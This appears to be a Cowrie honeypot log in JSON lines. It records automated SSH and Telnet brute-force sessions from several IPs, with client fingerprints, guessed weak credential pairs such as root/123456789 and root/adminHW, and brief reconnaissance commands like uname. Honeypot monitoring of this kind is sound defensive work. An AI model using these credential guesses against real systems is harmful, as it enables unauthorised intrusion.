{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:56:47.825499Z","src_ip":"45.125.211.194","session":"ae7b28e5b6bb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:56:48.016895Z","src_ip":"45.125.211.194","session":"ae7b28e5b6bb"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"nexus","message":"login attempt [nexus/nexus] failed","sensor":"my-vps","timestamp":"2025-08-28T03:56:48.855269Z","src_ip":"45.125.211.194","session":"ae7b28e5b6bb"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:56:50.067379Z","src_ip":"45.125.211.194","session":"ae7b28e5b6bb"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":41665,"dst_ip":"1.2.3.4","dst_port":22,"session":"e82b03b15bc7","protocol":"ssh","message":"New connection: 45.125.211.194:41665 (1.2.3.4:22) [session: e82b03b15bc7]","sensor":"my-vps","timestamp":"2025-08-28T03:57:02.575681Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:57:02.581933Z","src_ip":"45.125.211.194","session":"e82b03b15bc7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:57:02.790752Z","src_ip":"45.125.211.194","session":"e82b03b15bc7"}
{"eventid":"cowrie.login.failed","username":"app","password":"app","message":"login attempt [app/app] failed","sensor":"my-vps","timestamp":"2025-08-28T03:57:03.625554Z","src_ip":"45.125.211.194","session":"e82b03b15bc7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:57:04.837502Z","src_ip":"45.125.211.194","session":"e82b03b15bc7"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":16354,"dst_ip":"1.2.3.4","dst_port":22,"session":"63bbab425b6b","protocol":"ssh","message":"New connection: 45.125.211.194:16354 (1.2.3.4:22) [session: 63bbab425b6b]","sensor":"my-vps","timestamp":"2025-08-28T03:57:17.405225Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:57:17.409558Z","src_ip":"45.125.211.194","session":"63bbab425b6b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:57:17.613980Z","src_ip":"45.125.211.194","session":"63bbab425b6b"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia","message":"login attempt [nvidia/nvidia] failed","sensor":"my-vps","timestamp":"2025-08-28T03:57:18.445350Z","src_ip":"45.125.211.194","session":"63bbab425b6b"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:57:19.656302Z","src_ip":"45.125.211.194","session":"63bbab425b6b"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":32399,"dst_ip":"1.2.3.4","dst_port":22,"session":"f98e49cc8ed4","protocol":"ssh","message":"New connection: 45.125.211.194:32399 (1.2.3.4:22) [session: f98e49cc8ed4]","sensor":"my-vps","timestamp":"2025-08-28T03:57:32.290724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:57:32.299176Z","src_ip":"45.125.211.194","session":"f98e49cc8ed4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:57:32.499953Z","src_ip":"45.125.211.194","session":"f98e49cc8ed4"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.240.46","src_port":40894,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e88db8fd89d","protocol":"ssh","message":"New connection: 77.83.240.46:40894 (1.2.3.4:22) [session: 4e88db8fd89d]","sensor":"my-vps","timestamp":"2025-08-28T03:57:32.975965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:57:32.977139Z","src_ip":"77.83.240.46","session":"4e88db8fd89d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T03:57:32.991813Z","src_ip":"77.83.240.46","session":"4e88db8fd89d"}
{"eventid":"cowrie.login.failed","username":"loginuser","password":"12345678","message":"login attempt [loginuser/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T03:57:33.033576Z","src_ip":"77.83.240.46","session":"4e88db8fd89d"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:57:33.330374Z","src_ip":"45.125.211.194","session":"f98e49cc8ed4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:57:33.820210Z","src_ip":"45.125.211.194","session":"f98e49cc8ed4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:57:33.820947Z","src_ip":"45.125.211.194","session":"f98e49cc8ed4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:57:34.030057Z","src_ip":"45.125.211.194","session":"f98e49cc8ed4"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:57:34.031482Z","src_ip":"45.125.211.194","session":"f98e49cc8ed4"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:57:34.052788Z","src_ip":"77.83.240.46","session":"4e88db8fd89d"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":19870,"dst_ip":"1.2.3.4","dst_port":22,"session":"419e28db33e0","protocol":"ssh","message":"New connection: 45.125.211.194:19870 (1.2.3.4:22) [session: 419e28db33e0]","sensor":"my-vps","timestamp":"2025-08-28T03:57:47.179308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:57:47.202689Z","src_ip":"45.125.211.194","session":"419e28db33e0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:57:47.401124Z","src_ip":"45.125.211.194","session":"419e28db33e0"}
{"eventid":"cowrie.login.success","username":"root","password":"rootroot","message":"login attempt [root/rootroot] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:57:48.227210Z","src_ip":"45.125.211.194","session":"419e28db33e0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:57:48.739118Z","src_ip":"45.125.211.194","session":"419e28db33e0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:57:48.739917Z","src_ip":"45.125.211.194","session":"419e28db33e0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:57:48.952318Z","src_ip":"45.125.211.194","session":"419e28db33e0"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:57:48.953417Z","src_ip":"45.125.211.194","session":"419e28db33e0"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":60904,"dst_ip":"1.2.3.4","dst_port":22,"session":"6126bba63fad","protocol":"ssh","message":"New connection: 45.125.211.194:60904 (1.2.3.4:22) [session: 6126bba63fad]","sensor":"my-vps","timestamp":"2025-08-28T03:58:01.898415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:58:01.910599Z","src_ip":"45.125.211.194","session":"6126bba63fad"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:58:02.112254Z","src_ip":"45.125.211.194","session":"6126bba63fad"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123","message":"login attempt [es/es123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:58:02.946750Z","src_ip":"45.125.211.194","session":"6126bba63fad"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:58:04.158185Z","src_ip":"45.125.211.194","session":"6126bba63fad"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":38414,"dst_ip":"1.2.3.4","dst_port":22,"session":"499abc9df3ea","protocol":"ssh","message":"New connection: 45.125.211.194:38414 (1.2.3.4:22) [session: 499abc9df3ea]","sensor":"my-vps","timestamp":"2025-08-28T03:58:16.426684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:58:16.429965Z","src_ip":"45.125.211.194","session":"499abc9df3ea"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:58:16.640716Z","src_ip":"45.125.211.194","session":"499abc9df3ea"}
{"eventid":"cowrie.login.failed","username":"sugi","password":"sugi","message":"login attempt [sugi/sugi] failed","sensor":"my-vps","timestamp":"2025-08-28T03:58:17.470648Z","src_ip":"45.125.211.194","session":"499abc9df3ea"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:58:18.680762Z","src_ip":"45.125.211.194","session":"499abc9df3ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36688,"dst_ip":"1.2.3.4","dst_port":23,"session":"9a2bc2d2ac8e","protocol":"telnet","message":"New connection: 212.227.235.229:36688 (1.2.3.4:23) [session: 9a2bc2d2ac8e]","sensor":"my-vps","timestamp":"2025-08-28T03:58:34.524224Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:58:34.723289Z","src_ip":"212.227.235.229","session":"9a2bc2d2ac8e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:58:34.744313Z","src_ip":"212.227.235.229","session":"9a2bc2d2ac8e"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T03:58:34.745534Z","src_ip":"212.227.235.229","session":"9a2bc2d2ac8e"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T03:58:34.746408Z","src_ip":"212.227.235.229","session":"9a2bc2d2ac8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":20257,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ca8ab9fcc12","protocol":"ssh","message":"New connection: 212.227.125.160:20257 (1.2.3.4:22) [session: 1ca8ab9fcc12]","sensor":"my-vps","timestamp":"2025-08-28T03:58:34.747495Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T03:58:34.748393Z","src_ip":"212.227.125.160","session":"1ca8ab9fcc12"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T03:58:34.833589Z","src_ip":"212.227.125.160","session":"1ca8ab9fcc12"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T03:58:35.239557Z","src_ip":"212.227.125.160","session":"1ca8ab9fcc12"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:58:36.327399Z","src_ip":"212.227.125.160","session":"1ca8ab9fcc12"}
{"eventid":"cowrie.session.connect","src_ip":"195.178.110.224","src_port":50738,"dst_ip":"1.2.3.4","dst_port":22,"session":"44e41502c799","protocol":"ssh","message":"New connection: 195.178.110.224:50738 (1.2.3.4:22) [session: 44e41502c799]","sensor":"my-vps","timestamp":"2025-08-28T03:58:55.039693Z"}
